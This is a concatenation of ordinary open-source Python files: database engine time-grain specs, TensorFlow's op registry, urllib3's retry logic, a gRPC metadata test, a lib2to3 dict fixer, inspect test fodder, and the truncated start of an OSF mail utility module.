'P0.25Y'),
Grain('week_ending_saturday', _('week_ending_saturday'),
"date_add('day', 5, date_trunc('week', date_add('day', 1, "
'CAST({col} AS TIMESTAMP))))',
'P1W/1970-01-03T00:00:00Z'),
Grain('week_start_sunday', _('week_start_sunday'),
"date_add('day', -1, date_trunc('week', "
"date_add('day', 1, CAST({col} AS TIMESTAMP))))",
'1969-12-28T00:00:00Z/P1W'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "from_iso8601_date('{}')".format(dttm.isoformat()[:10])
if tt == 'TIMESTAMP':
return "from_iso8601_timestamp('{}')".format(dttm.isoformat())
return ("CAST ('{}' AS TIMESTAMP)"
.format(dttm.strftime('%Y-%m-%d %H:%M:%S')))
@classmethod
def epoch_to_dttm(cls):
return 'from_unixtime({col})'
class ClickHouseEngineSpec(BaseEngineSpec):
"""Dialect for ClickHouse analytical DB."""
engine = 'clickhouse'
time_secondary_columns = True
time_groupby_inline = True
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('minute', _('minute'),
'toStartOfMinute(toDateTime({col}))',
'PT1M'),
Grain('5 minute', _('5 minute'),
'toDateTime(intDiv(toUInt32(toDateTime({col})), 300)*300)',
'PT5M'),
Grain('10 minute', _('10 minute'),
'toDateTime(intDiv(toUInt32(toDateTime({col})), 600)*600)',
'PT10M'),
Grain('hour', _('hour'),
'toStartOfHour(toDateTime({col}))',
'PT1H'),
Grain('day', _('day'),
'toStartOfDay(toDateTime({col}))',
'P1D'),
Grain('month', _('month'),
'toStartOfMonth(toDateTime({col}))',
'P1M'),
Grain('quarter', _('quarter'),
'toStartOfQuarter(toDateTime({col}))',
'P0.25Y'),
Grain('year', _('year'),
'toStartOfYear(toDateTime({col}))',
'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "toDate('{}')".format(dttm.strftime('%Y-%m-%d'))
if tt == 'DATETIME':
return "toDateTime('{}')".format(
dttm.strftime('%Y-%m-%d %H:%M:%S'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
class BQEngineSpec(BaseEngineSpec):
"""Engine spec for Google's BigQuery
As contributed by @mxmzdlv on issue #945"""
engine = 'bigquery'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'), 'TIMESTAMP_TRUNC({col}, SECOND)', 'PT1S'),
Grain('minute', _('minute'), 'TIMESTAMP_TRUNC({col}, MINUTE)', 'PT1M'),
Grain('hour', _('hour'), 'TIMESTAMP_TRUNC({col}, HOUR)', 'PT1H'),
Grain('day', _('day'), 'TIMESTAMP_TRUNC({col}, DAY)', 'P1D'),
Grain('week', _('week'), 'TIMESTAMP_TRUNC({col}, WEEK)', 'P1W'),
Grain('month', _('month'), 'TIMESTAMP_TRUNC({col}, MONTH)', 'P1M'),
Grain('quarter', _('quarter'),
'TIMESTAMP_TRUNC({col}, QUARTER)', 'P0.25Y'),
Grain('year', _('year'), 'TIMESTAMP_TRUNC({col}, YEAR)', 'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "'{}'".format(dttm.strftime('%Y-%m-%d'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
def fetch_data(cls, cursor, limit):
data = super(BQEngineSpec, cls).fetch_data(cursor, limit)
if len(data) != 0 and type(data[0]).__name__ == 'Row':
data = [r.values() for r in data]
return data
class ImpalaEngineSpec(BaseEngineSpec):
"""Engine spec for Cloudera's Impala"""
engine = 'impala'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('minute', _('minute'), "TRUNC({col}, 'MI')", 'PT1M'),
Grain('hour', _('hour'), "TRUNC({col}, 'HH')", 'PT1H'),
Grain('day', _('day'), "TRUNC({col}, 'DD')", 'P1D'),
Grain('week', _('week'), "TRUNC({col}, 'WW')", 'P1W'),
Grain('month', _('month'), "TRUNC({col}, 'MONTH')", 'P1M'),
Grain('quarter', _('quarter'), "TRUNC({col}, 'Q')", 'P0.25Y'),
Grain('year', _('year'), "TRUNC({col}, 'YYYY')", 'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "'{}'".format(dttm.strftime('%Y-%m-%d'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
@classmethod
def get_schema_names(cls, inspector):
schemas = [row[0] for row in inspector.engine.execute('SHOW SCHEMAS')
if not row[0].startswith('_')]
return schemas
class DruidEngineSpec(BaseEngineSpec):
"""Engine spec for Druid.io"""
engine = 'druid'
inner_joins = False
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'), 'FLOOR({col} TO SECOND)', 'PT1S'),
Grain('minute', _('minute'), 'FLOOR({col} TO MINUTE)', 'PT1M'),
Grain('hour', _('hour'), 'FLOOR({col} TO HOUR)', 'PT1H'),
Grain('day', _('day'), 'FLOOR({col} TO DAY)', 'P1D'),
Grain('week', _('week'), 'FLOOR({col} TO WEEK)', 'P1W'),
Grain('month', _('month'), 'FLOOR({col} TO MONTH)', 'P1M'),
Grain('quarter', _('quarter'), 'FLOOR({col} TO QUARTER)', 'P3M'),
Grain('year', _('year'), 'FLOOR({col} TO YEAR)', 'P1Y'),
)
class KylinEngineSpec(BaseEngineSpec):
"""Dialect for Apache Kylin"""
engine = 'kylin'
time_grains = (
Grain('Time Column', _('Time Column'), '{col}', None),
Grain('second', _('second'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO SECOND) AS TIMESTAMP)',
'PT1S'),
Grain('minute', _('minute'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO MINUTE) AS TIMESTAMP)',
'PT1M'),
Grain('hour', _('hour'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO HOUR) AS TIMESTAMP)',
'PT1H'),
Grain('day', _('day'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO DAY) AS DATE)',
'P1D'),
Grain('week', _('week'),
'CAST(TIMESTAMPADD(WEEK, WEEK(CAST({col} AS DATE)) - 1, \
FLOOR(CAST({col} AS TIMESTAMP) TO YEAR)) AS DATE)',
'P1W'),
Grain('month', _('month'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO MONTH) AS DATE)',
'P1M'),
Grain('quarter', _('quarter'),
'CAST(TIMESTAMPADD(QUARTER, QUARTER(CAST({col} AS DATE)) - 1, \
FLOOR(CAST({col} AS TIMESTAMP) TO YEAR)) AS DATE)',
'P0.25Y'),
Grain('year', _('year'),
'CAST(FLOOR(CAST({col} AS TIMESTAMP) TO YEAR) AS DATE)',
'P1Y'),
)
@classmethod
def convert_dttm(cls, target_type, dttm):
tt = target_type.upper()
if tt == 'DATE':
return "CAST('{}' AS DATE)".format(dttm.isoformat()[:10])
if tt == 'TIMESTAMP':
return "CAST('{}' AS TIMESTAMP)".format(
dttm.strftime('%Y-%m-%d %H:%M:%S'))
return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
engines = {
o.engine: o for o in globals().values()
if inspect.isclass(o) and issubclass(o, BaseEngineSpec)}
| apache-2.0 |
vrv/tensorflow | tensorflow/python/framework/op_def_registry.py | 196 | 1428 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Global registry for OpDefs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import op_def_pb2
_registered_ops = {}
def register_op_list(op_list):
"""Register all the ops in an op_def_pb2.OpList."""
if not isinstance(op_list, op_def_pb2.OpList):
raise TypeError("%s is %s, not an op_def_pb2.OpList" %
(op_list, type(op_list)))
for op_def in op_list.op:
if op_def.name in _registered_ops:
assert _registered_ops[op_def.name] == op_def
else:
_registered_ops[op_def.name] = op_def
def get_registered_ops():
"""Returns a dictionary mapping names to OpDefs."""
return _registered_ops
| apache-2.0 |
catapult-project/catapult | third_party/urllib3/urllib3/util/retry.py | 25 | 15150 | from __future__ import absolute_import
import time
import logging
from collections import namedtuple
from itertools import takewhile
import email
import re
from ..exceptions import (
ConnectTimeoutError,
MaxRetryError,
ProtocolError,
ReadTimeoutError,
ResponseError,
InvalidHeader,
)
from ..packages import six
log = logging.getLogger(__name__)
# Data structure for representing the metadata of requests that result in a retry.
RequestHistory = namedtuple('RequestHistory', ["method", "url", "error",
"status", "redirect_location"])
class Retry(object):
""" Retry configuration.
Each retry attempt will create a new Retry object with updated values, so
they can be safely reused.
Retries can be defined as a default for a pool::
retries = Retry(connect=5, read=2, redirect=5)
http = PoolManager(retries=retries)
response = http.request('GET', 'http://example.com/')
Or per-request (which overrides the default for the pool)::
response = http.request('GET', 'http://example.com/', retries=Retry(10))
Retries can be disabled by passing ``False``::
response = http.request('GET', 'http://example.com/', retries=False)
Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless
retries are disabled, in which case the causing exception will be raised.
:param int total:
Total number of retries to allow. Takes precedence over other counts.
Set to ``None`` to remove this constraint and fall back on other
counts. It's a good idea to set this to some sensibly-high value to
account for unexpected edge cases and avoid infinite retry loops.
Set to ``0`` to fail on the first retry.
Set to ``False`` to disable and imply ``raise_on_redirect=False``.
:param int connect:
How many connection-related errors to retry on.
These are errors raised before the request is sent to the remote server,
which we assume has not triggered the server to process the request.
Set to ``0`` to fail on the first retry of this type.
:param int read:
How many times to retry on read errors.
These errors are raised after the request was sent to the server, so the
request may have side-effects.
Set to ``0`` to fail on the first retry of this type.
:param int redirect:
How many redirects to perform. Limit this to avoid infinite redirect
loops.
A redirect is a HTTP response with a status code 301, 302, 303, 307 or
308.
Set to ``0`` to fail on the first retry of this type.
Set to ``False`` to disable and imply ``raise_on_redirect=False``.
:param int status:
How many times to retry on bad status codes.
These are retries made on responses, where status code matches
``status_forcelist``.
Set to ``0`` to fail on the first retry of this type.
:param iterable method_whitelist:
Set of uppercased HTTP method verbs that we should retry on.
By default, we only retry on methods which are considered to be
idempotent (multiple requests with the same parameters end with the
same state). See :attr:`Retry.DEFAULT_METHOD_WHITELIST`.
Set to a ``False`` value to retry on any verb.
:param iterable status_forcelist:
A set of integer HTTP status codes that we should force a retry on.
A retry is initiated if the request method is in ``method_whitelist``
and the response status code is in ``status_forcelist``.
By default, this is disabled with ``None``.
:param float backoff_factor:
A backoff factor to apply between attempts after the second try
(most errors are resolved immediately by a second try without a
delay). urllib3 will sleep for::
{backoff factor} * (2 ** ({number of total retries} - 1))
seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep
for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer
than :attr:`Retry.BACKOFF_MAX`.
By default, backoff is disabled (set to 0).
:param bool raise_on_redirect: Whether, if the number of redirects is
exhausted, to raise a MaxRetryError, or to return a response with a
response code in the 3xx range.
:param bool raise_on_status: Similar meaning to ``raise_on_redirect``:
whether we should raise an exception, or return a response,
if status falls in ``status_forcelist`` range and retries have
been exhausted.
:param tuple history: The history of the request encountered during
each call to :meth:`~Retry.increment`. The list is in the order
the requests occurred. Each list item is of class :class:`RequestHistory`.
:param bool respect_retry_after_header:
Whether to respect Retry-After header on status codes defined as
:attr:`Retry.RETRY_AFTER_STATUS_CODES` or not.
:param iterable remove_headers_on_redirect:
Sequence of headers to remove from the request when a response
indicating a redirect is returned before firing off the redirected
request.
"""
DEFAULT_METHOD_WHITELIST = frozenset([
'HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE'])
RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503])
DEFAULT_REDIRECT_HEADERS_BLACKLIST = frozenset(['Authorization'])
#: Maximum backoff time.
BACKOFF_MAX = 120
def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,
method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,
backoff_factor=0, raise_on_redirect=True, raise_on_status=True,
history=None, respect_retry_after_header=True,
remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):
self.total = total
self.connect = connect
self.read = read
self.status = status
if redirect is False or total is False:
redirect = 0
raise_on_redirect = False
self.redirect = redirect
self.status_forcelist = status_forcelist or set()
self.method_whitelist = method_whitelist
self.backoff_factor = backoff_factor
self.raise_on_redirect = raise_on_redirect
self.raise_on_status = raise_on_status
self.history = history or tuple()
self.respect_retry_after_header = respect_retry_after_header
self.remove_headers_on_redirect = frozenset([
h.lower() for h in remove_headers_on_redirect])
def new(self, **kw):
params = dict(
total=self.total,
connect=self.connect, read=self.read, redirect=self.redirect, status=self.status,
method_whitelist=self.method_whitelist,
status_forcelist=self.status_forcelist,
backoff_factor=self.backoff_factor,
raise_on_redirect=self.raise_on_redirect,
raise_on_status=self.raise_on_status,
history=self.history,
remove_headers_on_redirect=self.remove_headers_on_redirect
)
params.update(kw)
return type(self)(**params)
@classmethod
def from_int(cls, retries, redirect=True, default=None):
""" Backwards-compatibility for the old retries format."""
if retries is None:
retries = default if default is not None else cls.DEFAULT
if isinstance(retries, Retry):
return retries
redirect = bool(redirect) and None
new_retries = cls(retries, redirect=redirect)
log.debug("Converted retries value: %r -> %r", retries, new_retries)
return new_retries
def get_backoff_time(self):
""" Formula for computing the current backoff
:rtype: float
"""
# We want to consider only the last consecutive errors sequence (Ignore redirects).
consecutive_errors_len = len(list(takewhile(lambda x: x.redirect_location is None,
reversed(self.history))))
if consecutive_errors_len <= 1:
return 0
backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1))
return min(self.BACKOFF_MAX, backoff_value)
def parse_retry_after(self, retry_after):
# Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4
if re.match(r"^\s*[0-9]+\s*$", retry_after):
seconds = int(retry_after)
else:
retry_date_tuple = email.utils.parsedate(retry_after)
if retry_date_tuple is None:
raise InvalidHeader("Invalid Retry-After header: %s" % retry_after)
retry_date = time.mktime(retry_date_tuple)
seconds = retry_date - time.time()
if seconds < 0:
seconds = 0
return seconds
def get_retry_after(self, response):
""" Get the value of Retry-After in seconds. """
retry_after = response.getheader("Retry-After")
if retry_after is None:
return None
return self.parse_retry_after(retry_after)
def sleep_for_retry(self, response=None):
retry_after = self.get_retry_after(response)
if retry_after:
time.sleep(retry_after)
return True
return False
def _sleep_backoff(self):
backoff = self.get_backoff_time()
if backoff <= 0:
return
time.sleep(backoff)
def sleep(self, response=None):
""" Sleep between retry attempts.
This method will respect a server's ``Retry-After`` response header
and sleep the duration of the time requested. If that is not present, it
will use an exponential backoff. By default, the backoff factor is 0 and
this method will return immediately.
"""
if response:
slept = self.sleep_for_retry(response)
if slept:
return
self._sleep_backoff()
def _is_connection_error(self, err):
""" Errors when we're fairly sure that the server did not receive the
request, so it should be safe to retry.
"""
return isinstance(err, ConnectTimeoutError)
def _is_read_error(self, err):
""" Errors that occur after the request has been started, so we should
assume that the server began processing it.
"""
return isinstance(err, (ReadTimeoutError, ProtocolError))
def _is_method_retryable(self, method):
""" Checks if a given HTTP method should be retried upon, depending if
it is included on the method whitelist.
"""
if self.method_whitelist and method.upper() not in self.method_whitelist:
return False
return True
def is_retry(self, method, status_code, has_retry_after=False):
""" Is this method/status code retryable? (Based on whitelists and control
variables such as the number of total retries to allow, whether to
respect the Retry-After header, whether this header is present, and
whether the returned status code is on the list of status codes to
be retried upon on the presence of the aforementioned header)
"""
if not self._is_method_retryable(method):
return False
if self.status_forcelist and status_code in self.status_forcelist:
return True
return (self.total and self.respect_retry_after_header and
has_retry_after and (status_code in self.RETRY_AFTER_STATUS_CODES))
def is_exhausted(self):
""" Are we out of retries? """
retry_counts = (self.total, self.connect, self.read, self.redirect, self.status)
retry_counts = list(filter(None, retry_counts))
if not retry_counts:
return False
return min(retry_counts) < 0
def increment(self, method=None, url=None, response=None, error=None,
_pool=None, _stacktrace=None):
""" Return a new Retry object with incremented retry counters.
:param response: A response object, or None, if the server did not
return a response.
:type response: :class:`~urllib3.response.HTTPResponse`
:param Exception error: An error encountered during the request, or
None if the response was received successfully.
:return: A new ``Retry`` object.
"""
if self.total is False and error:
# Disabled, indicate to re-raise the error.
raise six.reraise(type(error), error, _stacktrace)
total = self.total
if total is not None:
total -= 1
connect = self.connect
read = self.read
redirect = self.redirect
status_count = self.status
cause = 'unknown'
status = None
redirect_location = None
if error and self._is_connection_error(error):
# Connect retry?
if connect is False:
raise six.reraise(type(error), error, _stacktrace)
elif connect is not None:
connect -= 1
elif error and self._is_read_error(error):
# Read retry?
if read is False or not self._is_method_retryable(method):
raise six.reraise(type(error), error, _stacktrace)
elif read is not None:
read -= 1
elif response and response.get_redirect_location():
# Redirect retry?
if redirect is not None:
redirect -= 1
cause = 'too many redirects'
redirect_location = response.get_redirect_location()
status = response.status
else:
# Incrementing because of a server error like a 500 in
# status_forcelist and a the given method is in the whitelist
cause = ResponseError.GENERIC_ERROR
if response and response.status:
if status_count is not None:
status_count -= 1
cause = ResponseError.SPECIFIC_ERROR.format(
status_code=response.status)
status = response.status
history = self.history + (RequestHistory(method, url, error, status, redirect_location),)
new_retry = self.new(
total=total,
connect=connect, read=read, redirect=redirect, status=status_count,
history=history)
if new_retry.is_exhausted():
raise MaxRetryError(_pool, url, error or ResponseError(cause))
log.debug("Incremented Retry for (url='%s'): %r", url, new_retry)
return new_retry
def __repr__(self):
return ('{cls.__name__}(total={self.total}, connect={self.connect}, '
'read={self.read}, redirect={self.redirect}, status={self.status})').format(
cls=type(self), self=self)
# For backwards compatibility (equivalent to pre-v1.9):
Retry.DEFAULT = Retry(3)
| bsd-3-clause |
ctiller/grpc | src/python/grpcio_tests/tests/unit/_invalid_metadata_test.py | 13 | 6271 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test of RPCs made against gRPC Python's application-layer API."""
import unittest
import logging
import grpc
from tests.unit.framework.common import test_constants
_SERIALIZE_REQUEST = lambda bytestring: bytestring * 2
_DESERIALIZE_REQUEST = lambda bytestring: bytestring[len(bytestring) // 2:]
_SERIALIZE_RESPONSE = lambda bytestring: bytestring * 3
_DESERIALIZE_RESPONSE = lambda bytestring: bytestring[:len(bytestring) // 3]
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def _unary_unary_multi_callable(channel):
return channel.unary_unary(_UNARY_UNARY)
def _unary_stream_multi_callable(channel):
return channel.unary_stream(_UNARY_STREAM,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_unary_multi_callable(channel):
return channel.stream_unary(_STREAM_UNARY,
request_serializer=_SERIALIZE_REQUEST,
response_deserializer=_DESERIALIZE_RESPONSE)
def _stream_stream_multi_callable(channel):
return channel.stream_stream(_STREAM_STREAM)
class InvalidMetadataTest(unittest.TestCase):
def setUp(self):
self._channel = grpc.insecure_channel('localhost:8080')
self._unary_unary = _unary_unary_multi_callable(self._channel)
self._unary_stream = _unary_stream_multi_callable(self._channel)
self._stream_unary = _stream_unary_multi_callable(self._channel)
self._stream_stream = _stream_stream_multi_callable(self._channel)
def tearDown(self):
self._channel.close()
def testUnaryRequestBlockingUnaryResponse(self):
request = b'\x07\x08'
metadata = (('InVaLiD', 'UnaryRequestBlockingUnaryResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._unary_unary(request, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testUnaryRequestBlockingUnaryResponseWithCall(self):
request = b'\x07\x08'
metadata = (('InVaLiD', 'UnaryRequestBlockingUnaryResponseWithCall'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._unary_unary.with_call(request, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testUnaryRequestFutureUnaryResponse(self):
request = b'\x07\x08'
metadata = (('InVaLiD', 'UnaryRequestFutureUnaryResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._unary_unary.future(request, metadata=metadata)
def testUnaryRequestStreamResponse(self):
request = b'\x37\x58'
metadata = (('InVaLiD', 'UnaryRequestStreamResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._unary_stream(request, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testStreamRequestBlockingUnaryResponse(self):
request_iterator = (
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
metadata = (('InVaLiD', 'StreamRequestBlockingUnaryResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._stream_unary(request_iterator, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testStreamRequestBlockingUnaryResponseWithCall(self):
request_iterator = (
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
metadata = (('InVaLiD', 'StreamRequestBlockingUnaryResponseWithCall'),)
expected_error_details = "metadata was invalid: %s" % metadata
multi_callable = _stream_unary_multi_callable(self._channel)
with self.assertRaises(ValueError) as exception_context:
multi_callable.with_call(request_iterator, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testStreamRequestFutureUnaryResponse(self):
request_iterator = (
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
metadata = (('InVaLiD', 'StreamRequestFutureUnaryResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._stream_unary.future(request_iterator, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testStreamRequestStreamResponse(self):
request_iterator = (
b'\x07\x08' for _ in range(test_constants.STREAM_LENGTH))
metadata = (('InVaLiD', 'StreamRequestStreamResponse'),)
expected_error_details = "metadata was invalid: %s" % metadata
with self.assertRaises(ValueError) as exception_context:
self._stream_stream(request_iterator, metadata=metadata)
self.assertIn(expected_error_details, str(exception_context.exception))
def testInvalidMetadata(self):
self.assertRaises(TypeError, self._unary_unary, b'', metadata=42)
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
| apache-2.0 |
PaulKinlan/cli-caniuse | site/app/scripts/bower_components/jsrepl-build/extern/python/closured/lib/python2.7/lib2to3/fixes/fix_dict.py | 326 | 3824 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for dict methods.
d.keys() -> list(d.keys())
d.items() -> list(d.items())
d.values() -> list(d.values())
d.iterkeys() -> iter(d.keys())
d.iteritems() -> iter(d.items())
d.itervalues() -> iter(d.values())
d.viewkeys() -> d.keys()
d.viewitems() -> d.items()
d.viewvalues() -> d.values()
Except in certain very specific contexts: the iter() can be dropped
when the context is list(), sorted(), iter() or for...in; the list()
can be dropped when the context is list() or sorted() (but not iter()
or for...in!). Special contexts that apply to both: list(), sorted(), tuple()
set(), any(), all(), sum().
Note: iter(d.keys()) could be written as iter(d) but since the
original d.iterkeys() was also redundant we don't fix this. And there
are (rare) contexts where it makes a difference (e.g. when passing it
as an argument to a function that introspects the argument).
"""
# Local imports
from .. import pytree
from .. import patcomp
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, LParen, RParen, ArgList, Dot
from .. import fixer_util
iter_exempt = fixer_util.consuming_calls | set(["iter"])
class FixDict(fixer_base.BaseFix):
BM_compatible = True
PATTERN = """
power< head=any+
trailer< '.' method=('keys'|'items'|'values'|
'iterkeys'|'iteritems'|'itervalues'|
'viewkeys'|'viewitems'|'viewvalues') >
parens=trailer< '(' ')' >
tail=any*
>
"""
def transform(self, node, results):
head = results["head"]
method = results["method"][0] # Extract node for method name
tail = results["tail"]
syms = self.syms
method_name = method.value
isiter = method_name.startswith(u"iter")
isview = method_name.startswith(u"view")
if isiter or isview:
method_name = method_name[4:]
assert method_name in (u"keys", u"items", u"values"), repr(method)
head = [n.clone() for n in head]
tail = [n.clone() for n in tail]
special = not tail and self.in_special_context(node, isiter)
args = head + [pytree.Node(syms.trailer,
[Dot(),
Name(method_name,
prefix=method.prefix)]),
results["parens"].clone()]
new = pytree.Node(syms.power, args)
if not (special or isview):
new.prefix = u""
new = Call(Name(u"iter" if isiter else u"list"), [new])
if tail:
new = pytree.Node(syms.power, [new] + tail)
new.prefix = node.prefix
return new
P1 = "power< func=NAME trailer< '(' node=any ')' > any* >"
p1 = patcomp.compile_pattern(P1)
P2 = """for_stmt< 'for' any 'in' node=any ':' any* >
| comp_for< 'for' any 'in' node=any any* >
"""
p2 = patcomp.compile_pattern(P2)
def in_special_context(self, node, isiter):
if node.parent is None:
return False
results = {}
if (node.parent.parent is not None and
self.p1.match(node.parent.parent, results) and
results["node"] is node):
if isiter:
# iter(d.iterkeys()) -> iter(d.keys()), etc.
return results["func"].value in iter_exempt
else:
# list(d.keys()) -> list(d.keys()), etc.
return results["func"].value in fixer_util.consuming_calls
if not isiter:
return False
# for ... in d.iterkeys() -> for ... in d.keys(), etc.
return self.p2.match(node.parent, results) and results["node"] is node
| apache-2.0 |
javazquez/vertx-web | src/test/sockjs-protocol/venv/lib/python2.7/site-packages/linecache2/tests/inspect_fodder2.py | 17 | 1585 | # line 1
def wrap(foo=None):
def wrapper(func):
return func
return wrapper
# line 7
def replace(func):
def insteadfunc():
print('hello')
return insteadfunc
# line 13
@wrap()
@wrap(wrap)
def wrapped():
pass
# line 19
@replace
def gone():
pass
# line 24
oll = lambda m: m
# line 27
tll = lambda g: g and \
g and \
g
# line 32
tlli = lambda d: d and \
d
# line 36
def onelinefunc(): pass
# line 39
def manyargs(arg1, arg2,
arg3, arg4): pass
# line 43
def twolinefunc(m): return m and \
m
# line 47
a = [None,
lambda x: x,
None]
# line 52
def setfunc(func):
globals()["anonymous"] = func
setfunc(lambda x, y: x*y)
# line 57
def with_comment(): # hello
world
# line 61
multiline_sig = [
lambda x, \
y: x+y,
None,
]
# line 68
def func69():
class cls70:
def func71():
pass
return cls70
extra74 = 74
# line 76
def func77(): pass
(extra78, stuff78) = 'xy'
extra79 = 'stop'
# line 81
class cls82:
def func83(): pass
(extra84, stuff84) = 'xy'
extra85 = 'stop'
# line 87
def func88():
# comment
return 90
# line 92
def f():
class X:
def g():
"doc"
return 42
return X
method_in_dynamic_class = f().g
#line 101
def keyworded(*arg1, arg2=1):
pass
#line 105
def annotated(arg1: list):
pass
#line 109
def keyword_only_arg(*, arg):
pass
from functools import wraps
def decorator(func):
@wraps(func)
def fake():
return 42
return fake
#line 121
@decorator
def real():
return 20
| apache-2.0 |
HalcyonChimera/osf.io | website/mails/mails.py | 1 | 13197 | # -*- coding: utf-8 -*-
"""OSF mailing utilities.
Email templates go in website/templates/emails
Templates must end in ``.txt.mako`` for plaintext emails or``.html.mako`` for html emails.
You can then create a `Mail` object given the basename of the template and
the email subject. ::
CONFIRM_EMAIL = Mail(tpl_prefix='confirm', subject="Confirm your email address")
You can then use ``send_mail`` to send the email.
Usage: ::
from website import mails
...
mails.send_mail('foo@bar.com', mails.CONFIRM_EMAIL, user=user)
"""
import os
import logging
import waffle
from mako.lookup import TemplateLookup, Template
from framework.email import tasks
from osf import features
from website import settings
logger = logging.getLogger(__name__)
EMAIL_TEMPLATES_DIR = os.path.join(settings.TEMPLATES_PATH, 'emails')
_tpl_lookup = TemplateLookup(
directories=[EMAIL_TEMPLATES_DIR],
)
HTML_EXT = '.html.mako'
DISABLED_MAILS = [
'welcome',
'welcome_osf4i'
]
class Mail(object):
"""An email object.
:param str tpl_prefix: The template name prefix.
:param str subject: The subject of the email.
:param iterable categories: Categories to add to the email using SendGrid's
SMTPAPI. Used for email analytics.
See https://sendgrid.com/docs/User_Guide/Statistics/categories.html
:param: bool engagement: Whether this is an engagement email that can be disabled with
the disable_engagement_emails waffle flag
"""
def __init__(self, tpl_prefix, subject, categories=None, engagement=False):
self.tpl_prefix = tpl_prefix
self._subject = subject
self.categories = categories
self.engagement = engagement
def html(self, **context):
"""Render the HTML email message."""
tpl_name = self.tpl_prefix + HTML_EXT
return render_message(tpl_name, **context)
def subject(self, **context):
return Template(self._subject).render(**context)
def render_message(tpl_name, **context):
"""Render an email message."""
tpl = _tpl_lookup.get_template(tpl_name)
return tpl.render(**context)
def send_mail(
to_addr, mail, mimetype='html', from_addr=None, mailer=None, celery=True,
username=None, password=None, callback=None, attachment_name=None,
attachment_content=None, **context):
"""Send an email from the OSF.
Example: ::
from website import mails
mails.send_email('foo@bar.com', mails.TEST, name="Foo")
:param str to_addr: The recipient's email address
:param Mail mail: The mail object
:param str mimetype: Either 'plain' or 'html'
:param function callback: celery task to execute after send_mail completes
:param **context: Context vars for the message template
.. note:
Uses celery if available
"""
if waffle.switch_is_active(features.DISABLE_ENGAGEMENT_EMAILS) and mail.engagement:
return False
from_addr = from_addr or settings.FROM_EMAIL
mailer = mailer or tasks.send_email
subject = mail.subject(**context)
message = mail.html(**context)
# Don't use ttls and login in DEBUG_MODE
ttls = login = not settings.DEBUG_MODE
